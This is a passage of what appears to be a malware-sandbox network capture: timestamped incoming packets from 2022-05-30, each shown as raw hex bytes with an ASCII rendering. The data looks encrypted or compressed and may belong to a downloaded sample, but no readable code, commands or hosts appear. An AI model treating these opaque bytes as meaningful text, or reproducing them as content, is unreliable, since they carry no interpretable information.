DAf\|6ltGg~1HVnem]`$R"yxZnrC^piI<&_Q{rl
2022-05-30 12:45:59 UTC	510	IN	Data Raw: 2c 71 2d 00 23 de 5b 05 ae 6c 4a 01 08 71 a5 5e 98 7c 84 59 30 b6 e0 7b 81 31 c7 ea fc 12 7e 15 bc 8c 83 3d 3d 3d 5a 4a f6 1c 5b 1b 18 e1 8e 5a 73 27 f9 ad fb d8 89 35 1c c5 48 1e ed a7 ae b1 ca c4 f9 73 49 c5 cc ad 13 e5 82 24 ef 15 42 a9 5d 1e b4 b6 2b 82 83 c2 aa ac d9 b0 56 e5 1f 87 11 27 05 93 c0 67 1d 20 f5 08 63 07 f8 31 7c 74 60 4d a5 8e 8b 48 f5 e2 5d 64 87 d0 f1 ce 9f de 1a b7 73 9e 87 74 dc b1 b3 ba 39 2b 9f 82 ae b4 14 1f 1f 95 4d fe 58 51 b5 0e 9b fb 04 d1 b8 fa 1b b7 10 ef 15 31 01 f4 60 35 1c 16 d5 9f e8 da 3a 3c dd a3 ea 79 fa 90 2c 5e a7 85 2a 90 93 75 bb 19 32 48 38 e4 34 ff 5c 3b 5b 77 10 cf cb 21 b3 53 c1 ec 3b 15 a3 33 82 bc 1c 80 8d 89 a3 6c 10 3c d5 13 b4 04 49 76 32 41 91 24 1a 6a 57 58 fc d1 af d9 c9 76 29 0f 84 fc c2 87 9e a3 7a Data Ascii: ,q-#[lJq^\|Y0{1~===ZJ[Zs'5HsI$B]+V'g c1\|t`MH]dst9+MXQ1`5:<y,^*u2H84\;[w!S;3l<Iv2A$jWXv)z
2022-05-30 12:45:59 UTC	511	IN	Data Raw: ce 96 53 37 5b 87 be c7 24 57 dc 51 e3 a9 ae af a9 0d 28 05 14 07 4a 98 89 9b 4f f5 7f dd b3 c8 72 8c 6b 67 63 a3 82 ab 18 e6 c8 9a e4 57 c9 12 1f da 10 95 2e 26 8d 48 a0 18 c1 b9 40 3c c1 4e e1 81 0e 1d 00 56 0f d5 87 04 e6 5d 32 b9 a2 6e 03 b2 0c 65 c2 13 d1 50 81 ad 35 07 e3 9c 78 bf 70 d7 5b af b2 5d a9 c2 1a 53 8a c6 e3 21 1f 1c 79 2a 4f a5 37 dd ae 02 49 12 7f 4d 2c e5 d7 59 05 af e8 04 c6 d6 83 e1 12 1c 05 86 39 4a 2c b2 1f df 88 a2 a2 b2 13 93 f6 98 00 5b 58 7f e3 f1 a7 a9 4a 04 fc 77 86 e8 c9 fd 82 ca 4e 21 62 c3 7b 15 80 87 fa 0a 28 74 9f e0 cf 19 37 f5 af 0f 7e 77 7f d0 f9 22 7b 5a d2 b7 8c 91 af b0 44 dc 3e 36 b5 79 d9 5e cc df e1 4e b2 4d 50 a9 b0 6a 59 86 46 5a a5 a6 48 6c 7e 56 3b cb f9 db f4 bb 30 47 b9 b6 5f b2 d3 bc 00 fb e2 9e e3 25 23 Data Ascii: S7[$WQ(JOrkgcW.&H@<NV]2neP5xp[]S!y*O7IM,Y9J,[XJwN!b{(t7~w"{ZD>6y^NMPjYFZHl~V;0G_%#
2022-05-30 12:45:59 UTC	513	IN	Data Raw: cd f6 70 b1 73 9d 81 b2 d9 69 e5 3e bc cd 05 f1 63 5c 0c 32 fd 2d fc 37 4e 50 2d 97 0f db 6a 5f ab f2 ea 6a d7 11 90 60 b9 48 b1 2c 45 41 d6 02 9f d1 8b d6 22 06 b6 87 28 b7 02 bc 8d 51 57 a8 51 fb 14 38 ac dc b1 b9 78 6d ae 90 b9 47 49 16 af ef 6d 2c 90 c6 61 2e 75 58 91 22 a4 43 0e 24 d9 85 7b 66 cf b0 8e 1c ed 3a 49 66 1f cb 25 28 14 53 15 44 0f 4e 73 fa da c4 3d 1a e3 1e 6d cf e8 e6 c2 1c c7 d7 11 05 6d 9a 45 9d 25 95 33 d8 8d 2c 45 de 3a 04 dd 68 92 05 fd 50 34 b2 24 e0 a6 e0 01 c4 cb b4 19 23 ec 81 25 9d f0 9c 84 cf 7b 73 dd 27 6d 18 6b 93 cd 56 67 83 40 67 47 d2 37 02 24 00 03 c7 48 da 2c 2b bb 45 d0 20 c5 e1 87 58 5f f0 64 33 88 d9 8b e4 58 f3 3e 28 d4 f2 11 6c 17 64 8d 9c 66 ce 5d d4 d9 cd 35 8b e1 d6 be cf c0 56 dc 51 5b 8b 0d cc 15 c5 66 33 96 Data Ascii: psi>c\2-7NP-j_j`H,EA"(QWQ8xmGIm,a.uX"C${f:If%(SDNs=mmE%3,E:hP4$#%{s'mkVg@gG7$H,+E X_d3X>(ldf]5VQ[f3
2022-05-30 12:45:59 UTC	514	IN	Data Raw: 3e 4f 6c a7 c2 27 34 86 b9 1f ea bd 43 bb 9a c1 6d 48 b2 d2 91 f9 14 3e 26 26 bf d7 c2 93 ad 44 8f 0c 8c 7b 99 36 59 7e 64 41 ce c5 09 2d 69 b1 eb 4d 12 e2 aa 49 77 60 03 fc bb c2 1c 02 3c 3e 22 73 e4 56 4e 1f 87 df 7c 12 06 07 c8 31 33 f7 51 38 91 a7 69 eb 14 07 f0 11 50 5b 42 14 d7 ad c3 01 b8 c1 10 00 9f db de d4 99 7b 75 e2 84 29 5c 22 3a d5 ca 1c 72 57 ef c2 00 ea 62 ed 5a 35 48 1d 5b 72 d8 88 24 ac 88 af 01 e7 98 c5 05 2c 72 44 bf 52 a5 45 1d dd 3d a7 f7 78 b7 ff be 84 2f 84 70 0a 9f 1d 9b 4a cb 71 aa f7 1c 53 5c b7 53 81 d1 1b fa 0d 79 4f 9b e9 3e 16 e5 fa f6 37 58 82 78 00 c8 67 d6 44 12 dd 1a f9 b3 63 06 a6 f0 0c b4 25 a8 a5 94 ed 5a dd 92 62 ac 2b fa f8 81 d6 67 a2 31 bf ef bb 05 ae cd 69 fe c5 42 25 e8 f7 61 39 e5 fe ec de 47 86 74 8e 44 21 1a Data Ascii: >Ol'4CmH>&&D{6Y~dA-iMIw`<>"sVN\|13Q8iP[B{u)\":rWbZ5H[r$,rDRE=x/pJqS\SyO>7XxgDc%Zb+g1iB%a9GtD!
2022-05-30 12:45:59 UTC	515	IN	Data Raw: 58 49 9e 67 78 18 ae 65 52 c0 bb a2 6a 80 7e 64 c6 83 03 5a 49 4f 46 aa 90 b8 55 90 56 0c 6c 80 c0 18 1d a7 e9 56 62 c8 c6 08 7c 53 76 24 0a ab 76 f7 44 06 f9 4d 74 c0 c6 40 94 ad ca 49 c9 2b e8 6b c7 0f b1 38 87 f0 79 93 4c 8c 15 8b cf 5c b4 32 b2 90 57 b8 4b 4b d7 d5 68 2f f1 a8 2c 9c 10 48 35 40 97 6e 6e 9e 80 dc 18 2e ec 3f 31 dc d8 f3 60 0d 3c 77 b3 04 aa 6b a5 15 4f 62 b5 66 5c b5 06 23 c2 86 47 73 e3 ba 1f a8 b9 b9 96 5e 6e 17 11 2b ab 4c 4e c0 74 18 a9 eb 17 a4 79 92 46 e9 c2 b5 05 ec 24 88 62 99 17 71 d7 e9 2a cd 99 5f b2 d3 bc 00 54 ad 9e e3 ff 44 0f 2e ad 81 94 55 15 80 6e a9 0e 12 b1 72 61 9a 64 50 6e 5c b1 8b 3a 1c cd 45 16 58 91 14 aa c1 61 76 3b b8 d0 04 e8 f0 4f af c4 90 6f 00 2d c4 0d 68 02 fb 5d 0d b9 e0 15 d5 54 f8 8b f2 3b 8f 67 8d 2a Data Ascii: XIgxeRj~dZIOFUVlVb\|Sv$vDMt@I+k8yL\2WKKh/,H5@nn.?1`<wkObf\#Gs^n+LNtyF$bq_TD.UnradPn\:EXav;Oo-h]T;g
2022-05-30 12:45:59 UTC	516	IN	Data Raw: 38 23 b3 b1 b9 0a 54 5a 68 b3 02 5e 17 b3 5d 2a 98 f8 ce 4e 6d 3b 8c e9 25 a4 43 85 27 8c ca 53 15 42 a3 88 23 36 11 84 2a d3 7e 50 69 6a f5 61 1f c8 a4 97 8b 77 d3 62 c2 76 ba 84 24 f3 48 69 75 11 91 65 35 6b 27 7d fa e5 e4 33 ac 16 ea 65 de c0 53 dd 68 20 77 2f 43 1e 5e 0b 3b d2 f3 01 c4 e7 6a f7 6b f9 c7 25 7e 28 30 92 1d d5 ba 68 cd 1f dc c4 e1 d9 ec d4 f2 5f 4c fe 59 0f 63 d1 17 14 f3 ce ae 36 2f f5 5d 8b 24 be 73 b4 a3 d2 bd da 50 bc 2a f9 23 f7 f3 d4 66 96 5f 1d 5c 28 ee 21 ee 4b 71 e0 6e 31 cb 00 9c 1f f3 3a c1 10 a8 57 aa 81 8d 50 16 69 a4 30 d8 b2 6f 00 9e 42 de 78 af 71 b4 77 bd 41 1b 7f 8e 56 f3 95 aa 2b e6 22 a6 e5 15 c9 99 e1 d3 1e 14 ea fb 28 f4 fd 42 40 cd fa be 5d 4b 31 ef b6 83 97 d9 e3 03 e0 dc 36 d1 a6 2e 08 72 63 a6 1a 70 97 ad 60 44 Data Ascii: 8#TZh^]Nm;%C'SB#6~Pijawbv$Hiue5k'}3eSh w/C^;jk%~(0h_LYc6/]$sP*#f_\(!Kqn1:WPi0oBxqwAV+"(B@]K16.rcp`D
2022-05-30 12:45:59 UTC	518	IN	Data Raw: 1f e7 1f fa 0b 3e 57 06 b8 5f fe c2 9c f8 94 e5 94 39 19 49 35 b1 75 de b9 36 24 6a df 27 80 54 15 d1 75 bc d5 7f 24 41 fa 16 64 17 dd 49 73 52 6f 87 d7 3e 1b 1b 3d 5d 5e 27 13 d9 cd 37 e4 22 29 25 bb 12 fb ed af 6b 9b a3 bf b4 9e 8f a4 15 30 df 82 bc 1a 05 b5 92 21 e9 10 a9 45 fc 6b c9 b9 13 dd 3f 86 97 2c 79 b0 67 6c 77 f2 5a ae 92 1b d3 38 9a da 91 cd c6 4e c1 b2 f6 20 33 63 2d 8b 97 e5 d3 c6 44 56 eb c6 37 1c 4c a6 09 fa bb 7f 44 1c c4 ed 5a dd 2d 22 41 5d fa 57 fd 2f 57 6d 21 57 e9 f2 5d 81 da 96 ae b1 99 f5 4f b2 61 bc a8 c7 bd bb 7f be 75 8e 38 9d 8f e3 c0 c7 aa ac 42 68 82 8e 31 26 6b 1f ba 4f 43 c1 c0 83 21 72 3f 54 52 47 c0 35 88 4e dd 06 a9 45 13 f1 3e b8 15 59 9f f5 11 45 c8 6d fc 53 bc 9a b1 c3 03 54 71 fb d4 d1 3d 25 4a 9a cd 81 a6 ac fb c9 Data Ascii: >W_9I5u6$j'Tu$AdIsRo>=]^'7")%k0!Ek?,yglwZ8N 3c-DV7LDZ-"A]W/Wm!W]Oau8Bh1&kOC!r?TRG5NE>YEmSTq=%J
2022-05-30 12:45:59 UTC	519	IN	Data Raw: de 34 05 e1 e9 86 b2 e3 38 2c d7 2f 9b 58 1b b0 90 57 6e f4 21 4c 55 17 94 34 87 24 f9 35 50 dd a5 9c dd c7 6a 01 5c 12 5c 24 3e b2 30 cf fa 0a 28 08 fc c6 f0 31 9f f0 fd 27 98 ce 80 04 3e d6 c0 7c 7b 4f f6 91 09 62 6b 25 56 4a 1b 89 8d bb 33 99 ba 1e 3f 83 bc df 90 f8 a6 fa 0f 36 0c fa 84 5b 04 8a b0 b9 4a a0 82 0e 4d 56 82 6d 11 7f 1b 34 e8 e6 70 32 49 f0 44 05 2d 2f 4d 21 90 b9 97 85 f7 c3 fa 31 43 4b 23 e9 45 cf bc 2d 16 d3 e3 b9 05 b2 91 ea 03 96 12 61 9c 8a b6 b1 3c 8a d2 6b 73 c4 f8 47 98 27 e0 98 73 4e af a7 2c 3d 94 3f 55 d8 20 32 0d ef 48 93 0c 8e 8e 0b 29 e1 3e 02 6d 9b 47 3c 1c 85 28 c8 79 11 e2 72 a0 2b 41 bc d8 a0 29 a5 15 70 39 5f 90 19 ee 83 93 a9 f1 97 e6 c0 02 b7 f2 ff d7 51 94 3b b4 cb 78 2b fa 44 6b 84 15 46 a1 84 59 28 58 01 3e 90 9b Data Ascii: 48,/XWn!LU4$5Pj\\$>0(1'>\|{Obk%VJ3?6[JMVm4p2ID-/M!1CK#E-a<ksG'sN,=?U 2H)>mG<(yr+A)p9_Q;x+DkFY(X>
2022-05-30 12:45:59 UTC	520	IN	Data Raw: 2a f6 5e 27 40 33 64 90 02 cf d7 15 52 c9 53 01 ec 7f 87 41 8f e2 8c 09 86 ea 7d b3 82 28 d3 87 37 66 aa 81 75 7e 7c 3d 92 1d b6 bd 65 2c 70 7a 6b e7 44 d4 b1 66 20 b3 82 16 cb 6a 5c 8a ec cb 9b d5 ed d2 78 10 5b 9c 13 f2 5e e4 1d b5 32 33 b7 bc b8 b3 58 f3 91 2a d5 1a 1d 59 17 8e 80 51 1b 31 1f 6b 45 c5 83 cf de 52 75 42 73 7c a8 65 5b 94 73 cc 15 c3 1d 17 3c 42 20 0c c4 aa 9c cd 72 58 6f 36 06 b8 d3 7a 7e 0c 82 88 ab cf b5 ce a7 12 c9 14 d6 f6 39 d0 f2 76 35 e3 c3 6c e6 bf 49 10 8e e7 61 62 a3 5b 84 52 15 5b e4 d1 a8 b9 ca b3 9e ff 47 96 48 de 1d 8a 5a a1 87 13 d8 e3 17 17 78 bf fd 7b cc 8c 27 a2 a0 a7 43 df c8 2e fe 8b ec 89 de df cf 66 99 b9 29 06 27 60 04 e2 6c 0d ed ca aa 38 1b fa 98 5d 27 09 e3 58 b0 91 32 12 62 96 36 67 50 14 86 fe 78 bf 7e e3 3f Data Ascii: ^'@3dRSA}(7fu~\|=e,pzkDf j\x[^23XYQ1kERuBs\|e[s<B rXo6z~9v5lIab[R[GHZx{'C.f)'`l8]'X2b6gPx~?
2022-05-30 12:45:59 UTC	521	IN	Data Raw: 90 5b 77 22 27 3c 4f 5b 77 b9 98 0b 79 cc d1 73 2b 73 53 23 7a b9 df cb 42 17 f5 b9 70 46 25 50 02 28 db 12 53 c4 28 44 f0 2a 26 bd 0e 50 6b 69 ec 91 6d 3d 35 b8 bb c0 45 ec fb 89 18 60 db 1b 63 d7 94 db a7 8a 6f f5 55 dd 7b 80 52 d1 36 af b0 74 ff 62 b8 75 c7 2f 49 23 5a d2 85 46 9b a8 e9 3b c9 3f cd 98 97 b1 73 a5 50 ed 27 39 00 33 1e 70 fa 83 07 55 6f cd 02 ae f8 7f 4f 29 42 c7 82 5f c5 7b 24 a7 52 b7 f2 51 da 4e e9 17 7b 08 35 b8 4b fd 88 be 8c f9 56 43 8e c4 f9 6c c9 0d 2d 87 11 37 dc 36 c4 5d 89 41 06 ae b3 5a 81 87 61 42 66 64 6e 86 89 2f 0f 3f 72 c9 a1 8e 8c 6e 80 57 6d 37 28 2f 6c 66 ce 44 86 9c 37 81 f0 99 7a 3e 9c 97 03 8b f7 6b 7b 0d d7 50 6f d3 ba 2a 76 ba 59 23 18 28 c2 f4 ee 86 82 93 1f 28 18 f9 40 bb cc 27 00 89 cd 5f fc 75 4a 67 63 68 70 Data Ascii: [w"'<O[wys+sS#zBpF%P(S(D&Pkim=5E`coU{R6tbu/I#ZF;?sP'93pUoO)B_{$RQN{5KVCl-76]AZaBfdn/?rnWm7(/lfD7z>k{PovY#((@'_uJgchp
2022-05-30 12:45:59 UTC	523	IN	Data Raw: 8a b5 30 35 6e 1f bd f1 fe ad c7 fe fd b8 d1 50 e3 61 01 54 cc bc fc 4e e6 d7 16 81 3b ee 4f 04 3e d8 46 b5 72 92 47 fe ac 5a 49 d2 73 b9 e0 00 97 6c 61 1c 2b 81 fb 4d 1c 75 32 c7 67 31 1b ca b6 e6 8c 83 1d 18 e1 1c 3e 68 a6 32 b1 b5 da ce 38 7e 99 a5 30 c9 58 d7 3d 11 a9 fe 05 6e 27 43 d8 be 47 98 26 30 68 60 d9 20 4a 02 dd 8a ac bd 9d a8 39 a2 5e 05 df 83 c2 66 11 4a c2 ec 15 b3 a0 fb ac 90 4e 66 b4 1a cb 16 b1 d3 59 f0 15 7c 88 7d 4d a5 8e 88 bc f5 51 d6 9b 78 03 34 3f 2a e0 19 b7 f2 ff d5 79 34 45 fb ef 6f f1 5c 02 62 68 0e 1f 1f 9f 42 30 b1 fc eb 5c 73 e4 17 c2 c4 25 cb b2 11 3b 57 ef 15 38 22 d8 5a 32 47 e2 27 bb 26 e7 da ef 87 9f 1a 35 ce 60 f8 26 77 d9 5a 9d 44 26 b9 93 61 e4 08 ff 98 07 5b 77 68 6d cc 21 f6 39 58 a1 aa 3f 13 a5 ba 42 77 0e 20 7a Data Ascii: 05nPaTN;O>FrGZIsla+Mu2g1>h28~0X=n'CG&0h` J9^fJNfY\|}MQx4?*y4Eo\bhB0\s%;W8"Z2G'&5`&wZD&a[whm!9X?Bw z
2022-05-30 12:45:59 UTC	523	IN	Data Raw: 26 38 61 ff a2 07 42 18 c0 45 f8 db fc b7 e4 91 88 cd 84 19 bc 81 1d c4 a3 f6 79 b5 e7 43 4b 5a ff 01 73 6e 7d fd ca 93 7a 12 f4 1a 78 7e df 18 3b 7b c3 03 03 ca 8f f0 23 86 bf 20 02 89 a0 36 dd ff ae 5e 5d 7c 91 51 16 8c cd 04 de 75 07 96 e8 0e d5 9f e3 59 9f 52 e8 ab 81 f7 3b 15 80 67 a9 0f 12 2c 7c 61 9a 64 51 82 f5 5e af 90 1e cd 37 04 16 9b a4 36 c9 7b d4 75 a2 7f cd c6 68 a7 fd 81 f8 af 3a 6b c4 80 af e8 81 5c 22 c2 e0 15 e8 9b 01 4e 1e a6 4e 06 71 94 fd cc 38 b8 f7 f5 c2 2a cf 51 36 3c ab 5f fa 54 fa 14 76 71 1b 6e ca 0f 84 10 67 07 c6 f6 96 a4 41 dd 68 0b ba 55 c8 e3 74 bb 1a f9 5e 77 dc 5a ea 96 66 83 64 0a 62 4f 5a 1d 1f 4d 73 18 4c b9 c3 9b 71 b1 c5 70 84 44 9a 37 04 c4 b7 fc 61 d8 25 54 e7 53 ce 12 f5 a7 ec 68 22 e5 74 b1 cb b4 9d 0d b3 94 a1 Data Ascii: &8aBEyCKZsn}zx~;{# 6^]\|QuYR;g,\|adQ^76{uh:k\"NNq8*Q6<_TvqngAhUt^wZfdbOZMsLqpD7a%TSh"t
2022-05-30 12:45:59 UTC	525	IN	Data Raw: 2e 85 25 ff ae d9 2b e2 d4 fd a5 cf 1f 0e d0 48 9c 6a b7 cb df c3 05 2d ef 11 e8 db ec 70 d5 af 36 89 bf 16 33 ed 02 0d c0 9a 01 32 3a b8 2c df ea 57 e2 04 42 ae f4 99 fd ce 61 da 0c 9a 17 21 81 e3 45 cd 03 09 12 87 46 0c 0e 68 27 da 92 db f6 cb 02 e2 d5 ac 81 57 48 a4 19 98 93 28 bf bc 87 9e 72 8c c4 f0 b0 65 3b d8 d9 5c 39 1e 4c 3e 3f 58 50 5f d0 28 86 7b 8d 98 e8 18 c1 62 6d 70 83 56 ba e1 33 a8 b5 af f0 7f 5c 80 39 a4 8c 38 a5 b9 80 57 51 f4 9f 45 30 a1 66 c3 bd c9 a7 99 78 73 97 93 15 f3 30 de 06 d5 f0 39 8c c6 eb a4 1f b5 bb 64 14 89 8e 2a 9e e3 18 13 40 05 6f 4c f9 09 71 11 4b 63 8f 79 8c 3a bb 3e 3b 28 e2 91 eb e2 4b 3f 54 29 82 39 e4 73 e2 95 b1 0a 0b d5 1f f0 58 d8 85 9a 04 11 cb 00 90 c0 15 01 d6 23 46 4a fd 35 dc 86 b0 47 08 1d 31 32 93 50 92 Data Ascii: .%+Hj-p632:,WBa!EFh'WH(re;\9L>?XP_({bmpV3\98WQE0fxs09d*@oLqKcy:>;(K?T)9sX#FJ5G12P
2022-05-30 12:45:59 UTC	526	IN	Data Raw: f5 12 49 a7 65 fb fc 16 52 8a 62 55 47 af 45 42 ef cd 5a bb 38 70 11 05 f5 61 2d ff 18 67 07 9c fd 10 eb ae 47 0e 1d f7 6c f9 ea 7e 44 60 6c 9f 62 12 2d 73 a1 5d fa ec 22 52 bb 3f 22 57 dd df 38 39 25 81 72 16 73 32 87 27 89 78 2b b3 04 6f 7e ce fe 74 2f 10 9a 51 ef 45 e4 5d 72 7f 23 8c 1e 54 ad 6f ba 8c c2 3e 3f 88 d1 9a 83 29 45 31 45 fd 60 e2 0b 8d 66 20 4c 1e 4a b7 76 2d 0f 5b b6 37 7a ed ad a8 10 23 4e ae df f8 81 87 52 cd 3d 26 ca 55 83 38 59 ce 45 de ce 86 fe dd ce 46 0e 1f d4 e8 93 e4 17 65 29 be fb e8 e7 bb a1 8d 47 5c 23 e2 82 cc 7b 7f f1 7c cc f4 42 7b 89 4a 41 aa c8 6a 84 f4 06 ad b8 05 1f 5c 5d 9d 66 43 33 d8 6a 62 26 f9 83 b2 22 98 ec 2b 85 d7 9a 5a e3 c7 0f e0 7d a3 1b d1 77 e4 13 7e a5 2e 3c 52 8a 77 0d f8 42 27 8b d3 6b 93 1f f4 d4 e9 77 Data Ascii: IeRbUGEBZ8pa-gGl~D`lb-s]"R?"W89%rs2'x+o~t/QE]r#To>?)E1E`f LJv-[7z#NR=&U8YEFe)G\#{\|B{JAj\]fC3jb&"+Z}w~.<RwB'kw
2022-05-30 12:45:59 UTC	527	IN	Data Raw: 16 e3 97 dc 36 57 d5 16 19 5a b0 f6 03 3f 58 d4 b2 5a a6 a5 fc 2e ad 81 68 95 15 80 bc ea 29 63 df 7c 61 5d f1 69 15 16 7c cc 77 6b 2f bd 90 3a 99 14 29 10 61 76 3d 3c 1c 43 52 91 b0 c5 e2 41 e3 c6 2d c4 0b d4 ce f4 e7 95 c2 94 22 55 7a be 32 0d 3c d5 ce cd e6 b2 17 29 2e 7a fd 92 9b a9 15 1d 13 6e 98 1a 65 58 4e 2c 59 f2 15 8c 6c c6 1f 5a fc f5 60 4d 05 9a f3 d1 95 3a 2b 92 4c fd 60 4c d6 48 33 dc db cb 64 a1 94 f5 57 75 7b 9e d7 f7 32 df 91 a7 69 ad 2b 4a db b0 a5 89 21 08 6e ab 34 8a 70 ad c2 26 43 a7 58 e1 ab 08 2d 68 6c a9 46 ca 84 ee 6f 6e b5 bb 2b d7 49 a1 62 42 31 15 04 6b 6f 79 29 60 71 74 d1 a0 fe d9 8f 83 e2 2c 98 79 b1 33 bd 95 f2 3a 48 65 2a 8d 9b 39 10 ff 70 46 dd 46 61 1d 9b 4a c3 71 ac 1d 1c 53 a2 e5 14 04 8a a3 c4 d5 7a b6 d4 9e d1 2e e8 Data Ascii: 6WZ?XZ.h)c\|a]i\|wk/:)av=<CRA-"Uz2<).zneXN,YlZ`M:+L`LH3dWu{2i+J!n4p&CX-hlFon+IbB1koy)`qt,y3:He*9pFFaJqSz.
2022-05-30 12:45:59 UTC	529	IN	Data Raw: b7 31 74 1e 03 f3 37 e7 24 67 8a a3 06 36 bf ce 8c 2c 53 7e ef d4 46 fb 21 1e e9 d6 70 87 d6 c0 8c c4 71 56 0c 82 27 d9 55 f9 66 4f c0 84 66 ad 5f d1 f4 e2 9e ac 51 ea 18 b3 7e 21 5c 76 a0 13 0a eb 10 4f de 2b 44 08 e8 65 51 77 75 b1 8d 86 fe 28 5e 7f ef 17 5e f3 2b f8 de 33 9b fc 7f 89 a7 2e 4c 80 42 bf 2a 82 77 ac 02 64 e5 13 21 bb 82 ee 76 71 56 b6 7a 26 12 f4 dc 8c 75 f2 8c fa 07 83 c1 71 5f 4f e8 aa 48 3d f5 e2 0b 64 96 6f df d2 5d a2 b2 1d c3 ca dc c4 2e 55 9a 9b d4 17 ab b5 11 a0 14 d8 e8 22 bc 2a f1 d8 e8 62 4e 3f 5b db 6e d3 95 4a 3c 9f 90 37 19 37 2e dd a7 8c 7c 80 a2 e5 6c 4a e1 6c 14 03 2f b3 3b 19 1d 56 42 2a 69 7c fd 7c df 47 a7 af d6 12 41 1a e3 eb 86 34 9b d5 92 f0 c8 24 41 cd f2 b5 ff 51 1f 32 85 ae e7 9f 01 08 71 64 c2 b0 65 1c a6 44 2f Data Ascii: 1t7$g6,S~F!pqV'UfOf_Q~!\vO+DeQwu(^^+3.LBwd!vqVz&uq_OH=do].U"bN?[nJ<77.\|lJl/;VB*i\|\|GA4$AQ2qdeD/
2022-05-30 12:45:59 UTC	530	IN	Data Raw: 96 8b be 07 f8 b0 b5 24 39 97 65 fb 43 0e f1 5d 2e 99 46 e7 f3 d3 79 7d 72 6e d1 0f e2 95 8f 2e d3 44 6c 54 29 db 43 16 65 7c 60 89 b0 a3 01 30 77 ff 56 41 ef 53 49 b5 c3 3b bb 25 0e ee 43 54 55 f3 9a 3a 9a c5 84 36 c9 51 75 38 c9 35 c8 22 91 15 a1 2f 04 89 bd 39 1d 8a 23 21 83 f0 d3 d9 91 97 28 01 41 de ff 7c 2e 4e 62 f7 b1 ee 28 9f 2e 96 1f 75 68 9c 4b b8 c4 9b 13 e3 45 2b db 18 b0 49 3a 06 b8 42 05 1f 89 57 7d 64 4d 33 53 24 71 26 c7 eb 62 1c 68 86 77 20 e2 a8 7e 1f e5 97 e0 f6 0c c7 c6 eb 97 f8 69 c1 4a c3 d9 8a df 31 73 db 44 ee 08 da 68 7c 3d 33 3a 20 36 c1 a7 d0 be 17 f9 96 9a 9d 19 cd 75 b6 f8 d0 dc 44 0d 15 9f 09 7b c3 33 3f cc 8b 92 3b 87 81 46 13 5e 2d 41 ac ba 46 11 d5 77 3a a0 61 87 0e 36 86 0e 77 70 6c 41 2d a6 b3 56 36 7d 4a 16 c1 7d 76 07 Data Ascii: $9eC].Fy}rn.DlT)Ce\|`0wVASI;%CTU:6Qu85"/9#!(A\|.Nb(.uhKE+I:BW}dM3S$q&bhw ~iJ1sDh\|=3: 6uD{3?;F^-AFw:a6wplA-V6}J}v
2022-05-30 12:45:59 UTC	531	IN	Data Raw: 94 f5 6e ce a2 fc 95 c2 94 22 55 45 b5 32 0d 3d 8f 67 95 e9 62 16 ab 33 37 b1 b6 f2 11 2e 87 3c d7 67 85 93 e2 05 67 d6 be 68 17 7c 9e 42 20 0b 39 5f e2 bd e4 c8 87 71 f7 67 e6 34 89 47 1a 2c df 8a 23 3a 26 b0 31 21 49 8d 6f d9 d6 f7 2c 5d 73 91 d3 99 5d 55 2b 4e 63 a5 2b ed cf b2 18 ef 29 33 9d fb a8 54 83 7a 33 ed af 26 ab b7 5c ac dd 4d f3 db 9e 80 77 e8 7a f3 4b 20 10 d9 94 ee ec b4 87 11 eb 96 80 9c 44 8d 95 23 97 2b 83 8f bb 20 e8 5a 24 a8 36 1d ee 96 65 c2 b9 01 74 61 93 0c b2 9e 90 52 ae af bd 0d 80 0b cb 08 e9 d9 c9 45 1b ef b8 d5 c9 d7 cd 15 38 c8 5d 82 07 5b 05 26 8b 24 b4 d2 45 99 a9 14 f7 d8 2c c7 a1 0f b0 f4 d1 a7 68 64 e9 62 c9 2d 02 6a 5d fa 8e 47 c2 f2 6a 98 07 e9 32 15 2f cd 94 22 b1 73 94 55 73 a1 4c 60 38 03 bd 35 58 74 21 d7 46 c4 f1 Data Ascii: n"UE2=gb37.<ggh\|B 9_qg4G,#:&1!Io,]s]U+Nc+)3Tz3&\MwzK D#+ Z$6etaRE8][&$E,hdb-j]Gj2/"sUsL`85Xt!F
2022-05-30 12:45:59 UTC	532	IN	Data Raw: 3d 04 03 09 48 cc 7d 51 88 76 b1 8d 82 f6 28 22 1a 01 7e b9 5c 4e 11 4b 2b cb 90 0b 25 6c 80 aa 81 d9 39 5f 21 04 cc e2 44 6e 67 52 7b 10 2d 77 f8 a9 62 d1 5b 38 80 45 23 f2 6e 19 05 db 2f cc ce d8 94 be 75 26 4f 86 39 bb 68 13 90 38 58 76 5d 4d 6f dc aa 38 e8 70 0a 9c c2 ad fc 2a 71 01 8a 39 c3 63 4e 1c f2 75 19 43 76 a5 d4 b2 30 db 24 13 5a 6b fc 4e 5f ce 43 64 9c 0b 49 21 70 0a 75 60 44 a1 d7 25 67 eb 09 34 18 b0 72 12 a1 1a e0 d9 17 5f b0 9b c9 0c d0 92 f2 f8 a6 f2 97 32 99 3d cc 67 f8 22 0c ae b2 f9 dc 53 9d 1f cf 0d f6 da 7e b0 cc f2 f5 a8 60 f7 b0 db 20 a3 1d 79 fc 13 00 27 5e c5 c1 7c f0 94 ee 2f 95 3e 58 7d ce c5 c7 26 43 16 58 89 ac 81 70 98 89 b6 a4 0b 48 25 46 a7 74 f0 07 b8 9e 2f e0 b0 a7 e2 d3 b4 2e 19 3f e9 55 9b a1 e9 e2 a5 9f 67 95 e9 5a Data Ascii: =H}Qv("~\NK+%l9_!DngR{-wb[8E#n/u&O9h8Xv]Mo8p*q9cNuCv0$ZkN_CdI!pu`D%g4r_2=g"S~` y'^\|/>X}&CXpH%Ft/.?UgZ
2022-05-30 12:45:59 UTC	534	IN	Data Raw: b8 69 4f 15 a3 ab 8f 77 ac 09 85 32 75 2a 93 8f 2e 1b b0 de df dd 01 22 2f 3e 8d 55 ab a4 a4 66 c7 6c 57 29 41 b8 82 23 ff fb e5 df bb 87 db 68 0d dd 97 24 10 d3 5b ef 8b 45 57 6b 2c 2b 0c 0b 9b 62 11 8f e8 28 e0 89 9b 6e c0 d8 75 69 52 43 ff 62 9c 95 79 2e d1 fd 30 1c 0b e7 27 53 0b 6e 93 98 7b 5f aa 81 7a 9f 62 1e 5d 5b 79 2d d6 44 fa d8 56 64 94 6a b7 cb 77 30 7f 9e df 9b 98 cc 03 73 08 b9 fb 88 87 ef a4 ba 08 3e 82 d7 a1 74 f2 b7 3d ad ee ea 0e 0e c1 1b e7 d3 98 19 e7 de f9 7b 5c 5b a2 a0 ff 6b cc 8b e1 78 b8 85 a7 f7 e0 fb 38 ba ea 62 bc c3 d9 d0 00 4b 20 fd 40 b4 d3 5a 87 54 90 43 85 9b 56 a0 12 f3 fe 1c 58 9c 1d 3a 97 78 c8 c9 d9 1c 75 ce 0d 89 9a 91 50 1f b5 fc 55 dc 31 12 ba 0a bb a8 4b 54 0f 